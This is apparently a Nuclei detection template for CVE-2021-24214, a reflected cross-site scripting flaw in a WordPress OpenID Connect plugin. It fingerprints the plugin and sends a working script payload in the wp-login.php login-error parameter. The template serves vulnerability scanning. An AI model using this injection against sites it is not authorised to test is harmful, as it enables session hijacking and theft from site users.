68 lines
2.5 KiB
YAML
68 lines
2.5 KiB
YAML
id: CVE-2021-24214
|
|
|
|
info:
|
|
name: WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting
|
|
author: tess
|
|
severity: medium
|
|
description: WordPress OpenID Connect Generic Client plugin 3.8.0 and 3.8.1 contains a cross-site scripting vulnerability. It does not sanitize the login error when output back in the login form, thereby not requiring authentication, which can be exploited with the default configuration.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
|
|
remediation: |
|
|
Update to the latest version of the WordPress OpenID Connect Generic Client plugin (3.8.2) to fix this vulnerability.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/31cf0dfb-4025-4898-a5f4-fc7115565a10
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24214
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24214
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-24214
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00337
|
|
epss-percentile: 0.71271
|
|
cpe: cpe:2.3:a:daggerhartlab:openid_connect_generic_client:3.8.0:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: daggerhartlab
|
|
product: "openid_connect_generic_client"
|
|
framework: wordpress
|
|
tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,wp,openid,daggerhartlab
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /wp-content/plugins/daggerhart-openid-connect-generic/readme.txt HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: word
|
|
internal: true
|
|
words:
|
|
- 'OpenID Connect Generic Client'
|
|
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/wp-login.php?login-error=<script>alert(document.domain)</script>'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'ERROR (<script>alert(document.domain)</script>):'
|
|
- 'Login with OpenID Connect'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a0048304602210097abf31f4d9f5a9eff2f9fc9afd139f1d4f801ad11b7faafb35be9000783d4ec0221009a7dcd615fad2244184ba7593fec2380193559b77d7fea9366d3801bffdbb82d:922c64590222798bb761d5b6d8e72950 |